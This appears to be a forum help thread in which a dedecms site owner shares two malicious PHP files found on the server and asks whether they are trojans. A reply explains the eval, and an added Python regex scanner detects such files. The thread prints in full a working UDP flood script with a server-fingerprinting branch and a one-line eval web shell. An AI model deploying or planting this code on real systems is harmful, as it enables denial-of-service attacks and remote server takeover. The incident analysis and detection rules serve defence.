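My website runs on dedecms. Recently (within the past month) it has been shut down twice, each time with a notice that it was using too many resources.
I looked into the cause of the resource usage, and there are two files like this that use a lot of resources. [Evidence of resource usage]: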
时刻(SECONDS SINCE EPOCH) PID THR PRI NICE SIZE RES STATE C TIME WCPU COMMAND
20111013180000(1318500000): 37107 1 104 0 18404K 12852K CPU6 0 0:16 97.11% php
20111013180600(1318500360): 39894 1 105 0 18404K 12852K RUN 4 0:18 94.36% php

1.
116.255.195.25 - - [13/Oct/2011:18:01:54 +0800] "GET /data/cache/dueuro.php?host=174.139.87.229&port=80&time=18 HTTP/1.1" 200 1 "-" "Mozilla/4.0"text/html "/htdocs/data/cache/dueuro.php"

The source code of /htdocs/data/cache/dueuro.php is as follows:

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 128;
$packets = 0;
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
    if (StrLen($_GET['rat'])<>0){
        echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
        exit;
    }
    echo "err";
    exit;
}
for($i=0;$i<$Sendlen;$i++){
    $out .= "A";
}
$max_time = time()+$exec_time;
while(1){
    $packets++;
    if(time() > $max_time or $exec_time != 18){
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
    if($fp){
        fwrite($fp, $out);
        fclose($fp);
    }
}
?>

In addition, I also found an x.php file in the data directory; its source code is as follows:

<?php eval($_REQUEST[O]);//?>a

Is this a trojan?
<?php eval($_REQUEST[O]);//?>a
When x.php is accessed with a string of PHP code in the URL, eval turns it back into PHP code and executes it.
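A check a site owner could run over the web root to find other files like the two quoted in this thread, as an added example that is not part of the original posts. The rule names, function names and the clean sample are assumptions made for the illustration.

```python
import re
from pathlib import Path

# Indicators taken from the two files quoted in the thread.
RULES = {
    # x.php: eval() called directly on request data
    "eval-of-request-input": re.compile(
        r"\beval\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I),
    # dueuro.php: fsockopen() to a udp:// target
    "udp-socket": re.compile(r"\bfsockopen\s*\(\s*[\"']udp://", re.I),
}

def scan_source(src):
    """Return [(line_number, rule_name), ...] for one PHP source text.
    Matching is per line, so a call split across lines is not caught."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                findings.append((lineno, name))
    return findings

def scan_tree(root):
    """Scan every *.php file under root; return {relative_path: findings}."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*.php")):
        found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

# Constructed samples: the one-liner and a few lines excerpted from the thread,
# plus a harmless file that reads a request parameter without evaluating it.
SAMPLE_X = r'''<?php eval($_REQUEST[O]);//?>a'''
SAMPLE_FLOOD = r'''<?php
set_time_limit(999999);
$host = $_GET['host'];
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
'''
SAMPLE_CLEAN = r'''<?php echo htmlspecialchars($_GET["q"]); ?>'''

if __name__ == "__main__":
    for label, src in [("x.php", SAMPLE_X), ("dueuro.php", SAMPLE_FLOOD),
                       ("clean.php", SAMPLE_CLEAN)]:
        print(label, scan_source(src))
```

A hit is a reason to read the file, not proof by itself; compare anything flagged against a clean copy of the same dedecms release.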